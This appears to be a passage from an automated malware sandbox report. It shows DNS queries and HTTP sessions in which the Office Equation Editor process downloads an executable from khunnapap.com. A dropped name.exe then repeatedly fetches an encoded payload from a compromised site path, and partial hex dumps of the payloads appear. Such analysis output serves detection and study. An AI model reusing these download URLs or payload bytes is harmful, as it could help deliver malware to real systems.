                                                                      Nov 27, 2020 08:27:05.052090883 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.052129030 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.052141905 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.052176952 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.052186966 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.052227974 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.052236080 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.052277088 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.052285910 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.052325010 CET8049165128.199.253.44192.168.2.22

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 27, 2020 08:27:03.493489027 CET5219753192.168.2.228.8.8.8
                                                                      Nov 27, 2020 08:27:03.839210033 CET53521978.8.8.8192.168.2.22
                                                                      Nov 27, 2020 08:27:03.839448929 CET5219753192.168.2.228.8.8.8
                                                                      Nov 27, 2020 08:27:03.874870062 CET53521978.8.8.8192.168.2.22
                                                                      Nov 27, 2020 08:27:13.029138088 CET5309953192.168.2.228.8.8.8
                                                                      Nov 27, 2020 08:27:13.056329966 CET53530998.8.8.8192.168.2.22
                                                                      Nov 27, 2020 08:27:13.144454002 CET5283853192.168.2.228.8.8.8
                                                                      Nov 27, 2020 08:27:13.315857887 CET53528388.8.8.8192.168.2.22
                                                                      Nov 27, 2020 08:27:13.331212044 CET6120053192.168.2.228.8.8.8
                                                                      Nov 27, 2020 08:27:13.366880894 CET53612008.8.8.8192.168.2.22
                                                                      Nov 27, 2020 08:27:55.571918011 CET4954853192.168.2.228.8.8.8
                                                                      Nov 27, 2020 08:27:55.599250078 CET53495488.8.8.8192.168.2.22
                                                                      Nov 27, 2020 08:27:55.702537060 CET5562753192.168.2.228.8.8.8
                                                                      Nov 27, 2020 08:27:55.737932920 CET53556278.8.8.8192.168.2.22
                                                                      Nov 27, 2020 08:27:55.745898962 CET5600953192.168.2.228.8.8.8
                                                                      Nov 27, 2020 08:27:55.925196886 CET53560098.8.8.8192.168.2.22
                                                                      Nov 27, 2020 08:28:05.911607027 CET6186553192.168.2.228.8.8.8
                                                                      Nov 27, 2020 08:28:05.938766956 CET53618658.8.8.8192.168.2.22
                                                                      Nov 27, 2020 08:28:06.017550945 CET5517153192.168.2.228.8.8.8
                                                                      Nov 27, 2020 08:28:06.185575962 CET53551718.8.8.8192.168.2.22
                                                                      Nov 27, 2020 08:28:06.199385881 CET5249653192.168.2.228.8.8.8
                                                                      Nov 27, 2020 08:28:06.235008955 CET53524968.8.8.8192.168.2.22

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Nov 27, 2020 08:27:03.493489027 CET192.168.2.228.8.8.80xd92dStandard query (0)khunnapap.comA (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:03.839448929 CET192.168.2.228.8.8.80xd92dStandard query (0)khunnapap.comA (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:13.029138088 CET192.168.2.228.8.8.80xafdStandard query (0)discord.comA (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:13.144454002 CET192.168.2.228.8.8.80x6222Standard query (0)fanosethiopiatours.comA (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:13.331212044 CET192.168.2.228.8.8.80x4f7dStandard query (0)fanosethiopiatours.comA (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:55.571918011 CET192.168.2.228.8.8.80xc34cStandard query (0)discord.comA (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:55.702537060 CET192.168.2.228.8.8.80x696bStandard query (0)fanosethiopiatours.comA (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:55.745898962 CET192.168.2.228.8.8.80x6c80Standard query (0)fanosethiopiatours.comA (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:28:05.911607027 CET192.168.2.228.8.8.80xe5f5Standard query (0)discord.comA (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:28:06.017550945 CET192.168.2.228.8.8.80x6290Standard query (0)fanosethiopiatours.comA (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:28:06.199385881 CET192.168.2.228.8.8.80xab2cStandard query (0)fanosethiopiatours.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Nov 27, 2020 08:27:03.839210033 CET8.8.8.8192.168.2.220xd92dNo error (0)khunnapap.com128.199.253.44A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:03.874870062 CET8.8.8.8192.168.2.220xd92dNo error (0)khunnapap.com128.199.253.44A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:13.056329966 CET8.8.8.8192.168.2.220xafdNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:13.056329966 CET8.8.8.8192.168.2.220xafdNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:13.056329966 CET8.8.8.8192.168.2.220xafdNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:13.056329966 CET8.8.8.8192.168.2.220xafdNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:13.056329966 CET8.8.8.8192.168.2.220xafdNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:13.315857887 CET8.8.8.8192.168.2.220x6222No error (0)fanosethiopiatours.com50.87.153.103A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:13.366880894 CET8.8.8.8192.168.2.220x4f7dNo error (0)fanosethiopiatours.com50.87.153.103A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:55.599250078 CET8.8.8.8192.168.2.220xc34cNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:55.599250078 CET8.8.8.8192.168.2.220xc34cNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:55.599250078 CET8.8.8.8192.168.2.220xc34cNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:55.599250078 CET8.8.8.8192.168.2.220xc34cNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:55.599250078 CET8.8.8.8192.168.2.220xc34cNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:55.737932920 CET8.8.8.8192.168.2.220x696bNo error (0)fanosethiopiatours.com50.87.153.103A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:27:55.925196886 CET8.8.8.8192.168.2.220x6c80No error (0)fanosethiopiatours.com50.87.153.103A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:28:05.938766956 CET8.8.8.8192.168.2.220xe5f5No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:28:05.938766956 CET8.8.8.8192.168.2.220xe5f5No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:28:05.938766956 CET8.8.8.8192.168.2.220xe5f5No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:28:05.938766956 CET8.8.8.8192.168.2.220xe5f5No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:28:05.938766956 CET8.8.8.8192.168.2.220xe5f5No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:28:06.185575962 CET8.8.8.8192.168.2.220x6290No error (0)fanosethiopiatours.com50.87.153.103A (IP address)IN (0x0001)
                                                                      Nov 27, 2020 08:28:06.235008955 CET8.8.8.8192.168.2.220xab2cNo error (0)fanosethiopiatours.com50.87.153.103A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • khunnapap.com
                                                                      • fanosethiopiatours.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.2249165128.199.253.4480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 27, 2020 08:27:04.177026033 CET0OUTGET /inc/lxpo.exe HTTP/1.1
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: khunnapap.com
                                                                      Connection: Keep-Alive
                                                                      Nov 27, 2020 08:27:04.480389118 CET2INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Fri, 27 Nov 2020 07:27:03 GMT
                                                                      Content-Type: application/x-msdownload
                                                                      Content-Length: 1218752
                                                                      Last-Modified: Wed, 25 Nov 2020 04:41:22 GMT
                                                                      Connection: keep-alive
                                                                      ETag: "5fbde072-1298c0"
                                                                      Accept-Ranges: bytes
                                                                      Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 af c1 0b 01 02 19 00 e8 07 00 00 56 0a 00 00 00 00 00 98 f6 07 00 00 10 00 00 00 00 08 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 12 00 00 06 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 08 00 ca 24 00 00 00 30 09 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 44 12 00 c0 54 00 00 00 a0 08 00 34 8f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 08 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 14 e7 07 00 00 10 00 00 00 e8 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 9c 21 00 00 00 00 08 00 00 22 00 00 00 ee 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 35 11 00 00 00 30 08 00 00 00 00 00 00 10 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ca 24 00 00 00 50 08 00 00 26 00 00 00 10 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 80 08 00 00 00 00 00 00 36 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 90 08 00 00 02 00 00 00 36 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 34 8f 00 00 00 a0 08 00 00 90 00 00 00 38 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 7c 09 00 00 30 09 00 00 7c 09 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 12 00 00 00 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*V@@P$0|DT4CODE `DATA!"@BSS50.idata$P&@.tls@6.rdata6@P.reloc48@P.rsrc|0|@PB@P


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.224916750.87.153.10380C:\Users\Public\name.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 27, 2020 08:27:13.538929939 CET1293OUTGET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                      Host: fanosethiopiatours.com
                                                                      Nov 27, 2020 08:27:13.717318058 CET1295INHTTP/1.1 200 OK
                                                                      Date: Fri, 27 Nov 2020 07:27:13 GMT
                                                                      Server: Apache
                                                                      Upgrade: h2,h2c
                                                                      Connection: Upgrade, Keep-Alive
                                                                      Last-Modified: Wed, 25 Nov 2020 04:37:45 GMT
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 967680
                                                                      Vary: User-Agent
                                                                      Keep-Alive: timeout=5, max=75
                                                                      Data Raw: 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 64 37 39 33 31 30 30 33 39 33 66 32 38 37 30 31 31 35 33 31 66 33 64 31 62 36 35 32 61 35 36 35 35 37 39 35 37 33 61 33 30 33 34 33 30 34 31 34 66 37 66 35 33 32 63 33 62 32 30 33 66 35 65 37 38 37 62 35 61 37 34 37 64 37 38 37 39 31 31 31 65 37 64 35 36 30 35 30 35 36 61 36 39 31 37 31 35 36 35 35 32 37 64 37 33 30 61 31 33 36 38 36 38 37 33 35 63 31 39 37 38 31 65 31 64 30 32 37 34 31 36 35 30 37 64 37 30 30 39 36 64 31 32 31 36 30 30 34 64 37 63 37 39 30 66 36 34 36 37 36 37 31 39 35 62 37 32 37 38 31 66 36 62 31 62 31 34 37 33 32 31 30 32 30 35 30 63 36 31 37 36 31 34 36 31 32 37 36 32 31 31 36 32 36 39 31 37 31 36 37 36 35 38 37 32 37 36 37 30 37 64 31 64 31 39 37 38 35 62 30 66 30 63 36 64 36 65 31 39 31 38 36 37 35 34 37 36 37 62 30 65 31 66 36 66 36 64 37 65 35 36 31 30 37 66 31 39 31 33 30 66 37 36 31 30 35 62 37 35 37 34 30 35 36 61 31 37 31 62 30 61 34 34 37 62 37 65 30 31 36 39 36 35 36 31 31 32 35 33 37 36 37 34 31 38 36 65 31 36 31 65 37 61 32 36 30 35 30 62 30 31 36 33 37 30 31 66 36 39 32 33 36 65 31 36 36 37 36 34 31 64 31 66 37 31 35 66 37 63 37 62 37 32 37 62 31 36 31 31 37 63 35 37 30 38 30 39 36 30 36 34 31 30 31 66 36 30 35 61 37 62 37 39 30 38 31 34 36 37 36 39 37 32 35 31 31 35 37 32 31 33 31 61 30 38 37 31 31 65 35 36 37 37 37 33 32 39 32 30 34 66 37 30 37 39 35 31 37 36 37 33 37 65 37 32 31 39 31 36 37 34 35 34 30 39 30 38 36 64 36 34 31 66 31 37 36 65 35 30 37 33 37 35 30 31 31 62 36 30 36 31 37 31 35 30 31 34 37 66 31 33 31 35 30 30 37 66 31 34 35 65 37 62 37 62 37 30 37 36 30 64 30 33 37 38 35 30 37 62 37 33 37 31 37 61 31 37 31 63 37 63 35 38 30 30 30 37 36 61 36 63 31 63 31 36 36 66 35 64 37 33 37 61 30 39 31 35 36 61 36 39 37 64 35 39 31 62 37 38 31 62 31 36 30 31 37 65 31 39 35 65 37 34 37 65 30 65 35 31 37 61 62 31 34 62 61 39 65 35 30 61 39 36 66 65 39 34 39 36 39 32 37 38 64 61 33 36 39 39
                                                                      Data Ascii: 70908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706d793100393f287011531f3d1b652a565579573a303430414f7f532c3b203f5e787b5a747d7879111e7d5605056a69171565527d730a136868735c19781e1d027416507d70096d1216004d7c790f646767195b72781f6b1b14732102050c617614612762116269171676587276707d1d19785b0f0c6d6e19186754767b0e1f6f6d7e56107f19130f76105b7574056a171b0a447b7e0169656112537674186e161e7a26050b0163701f69236e1667641d1f715f7c7b727b16117c5708096064101f605a7b790814676972511572131a08711e56777329204f70795176737e721916745409086d641f176e507375011b60617150147f1315007f145e7b7b70760d0378507b73717a171c7c5800076a6c1c166f5d737a09156a697d591b781b16017e195e747e0e517ab14ba9e50a96fe94969278da3699


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.224916950.87.153.10380C:\Users\Public\name.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 27, 2020 08:27:56.096781969 CET2315OUTGET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                      Host: fanosethiopiatours.com
                                                                      Nov 27, 2020 08:27:56.272572994 CET2316INHTTP/1.1 200 OK
                                                                      Date: Fri, 27 Nov 2020 07:27:56 GMT
                                                                      Server: Apache
                                                                      Upgrade: h2,h2c
                                                                      Connection: Upgrade, Keep-Alive
                                                                      Last-Modified: Wed, 25 Nov 2020 04:37:45 GMT
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 967680
                                                                      Vary: User-Agent
                                                                      Keep-Alive: timeout=5, max=75
                                                                      Data Raw: 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 64 37 39 33 31 30 30 33 39 33 66 32 38 37 30 31 31 35 33 31 66 33 64 31 62 36 35 32 61 35 36 35 35 37 39 35 37 33 61 33 30 33 34 33 30 34 31 34 66 37 66 35 33 32 63 33 62 32 30 33 66 35 65 37 38 37 62 35 61 37 34 37 64 37 38 37 39 31 31 31 65 37 64 35 36 30 35 30 35 36 61 36 39 31 37 31 35 36 35 35 32 37 64 37 33 30 61 31 33 36 38 36 38 37 33 35 63 31 39 37 38 31 65 31 64 30 32 37 34 31 36 35 30 37 64 37 30 30 39 36 64 31 32 31 36 30 30 34 64 37 63 37 39 30 66 36 34 36 37 36 37 31 39 35 62 37 32 37 38 31 66 36 62 31 62 31 34 37 33 32 31 30 32 30 35 30 63 36 31 37 36 31 34 36 31 32 37 36 32 31 31 36 32 36 39 31 37 31 36 37 36 35 38 37 32 37 36 37 30 37 64 31 64 31 39 37 38 35 62 30 66 30 63 36 64 36 65 31 39 31 38 36 37 35 34 37 36 37 62 30 65 31 66 36 66 36 64 37 65 35 36 31 30 37 66 31 39 31 33 30 66 37 36 31 30 35 62 37 35 37 34 30 35 36 61 31 37 31 62 30 61 34 34 37 62 37 65 30 31 36 39 36 35 36 31 31 32 35 33 37 36 37 34 31 38 36 65 31 36 31 65 37 61 32 36 30 35 30 62 30 31 36 33 37 30 31 66 36 39 32 33 36 65 31 36 36 37 36 34 31 64 31 66 37 31 35 66 37 63 37 62 37 32 37 62 31 36 31 31 37 63 35 37 30 38 30 39 36 30 36 34 31 30 31 66 36 30 35 61 37 62 37 39 30 38 31 34 36 37 36 39 37 32 35 31 31 35 37 32 31 33 31 61 30 38 37 31 31 65 35 36 37 37 37 33 32 39 32 30 34 66 37 30 37 39 35 31 37 36 37 33 37 65 37 32 31 39 31 36 37 34 35 34 30 39 30 38 36 64 36 34 31 66 31 37 36 65 35 30 37 33 37 35 30 31 31 62 36 30 36 31 37 31 35 30 31 34 37 66 31 33 31 35 30 30 37 66 31 34 35 65 37 62 37 62 37 30 37 36 30 64 30 33 37 38 35 30 37 62 37 33 37 31 37 61 31 37 31 63 37 63 35 38 30 30 30 37 36 61 36 63 31 63 31 36 36 66 35 64 37 33 37 61 30 39 31 35 36 61 36 39 37 64 35 39 31 62 37 38 31 62 31 36 30 31 37 65 31 39 35 65 37 34 37 65 30 65 35 31 37 61 62 31 34 62 61 39 65 35 30 61 39 36 66 65 39 34 39 36 39 32 37 38 64 61 33 36 39 39
                                                                      Data Ascii: 70908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706d793100393f287011531f3d1b652a565579573a303430414f7f532c3b203f5e787b5a747d7879111e7d5605056a69171565527d730a136868735c19781e1d027416507d70096d1216004d7c790f646767195b72781f6b1b14732102050c617614612762116269171676587276707d1d19785b0f0c6d6e19186754767b0e1f6f6d7e56107f19130f76105b7574056a171b0a447b7e0169656112537674186e161e7a26050b0163701f69236e1667641d1f715f7c7b727b16117c5708096064101f605a7b790814676972511572131a08711e56777329204f70795176737e721916745409086d641f176e507375011b60617150147f1315007f145e7b7b70760d0378507b73717a171c7c5800076a6c1c166f5d737a09156a697d591b781b16017e195e747e0e517ab14ba9e50a96fe94969278da3699


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.224917150.87.153.10380C:\Users\Public\name.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 27, 2020 08:28:06.407383919 CET3328OUTGET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                      Host: fanosethiopiatours.com
                                                                      Nov 27, 2020 08:28:06.583466053 CET3330INHTTP/1.1 200 OK
                                                                      Date: Fri, 27 Nov 2020 07:28:06 GMT
                                                                      Server: Apache
                                                                      Upgrade: h2,h2c
                                                                      Connection: Upgrade, Keep-Alive
                                                                      Last-Modified: Wed, 25 Nov 2020 04:37:45 GMT
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 967680
                                                                      Vary: User-Agent
                                                                      Keep-Alive: timeout=5, max=75
                                                                      Data Raw: 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 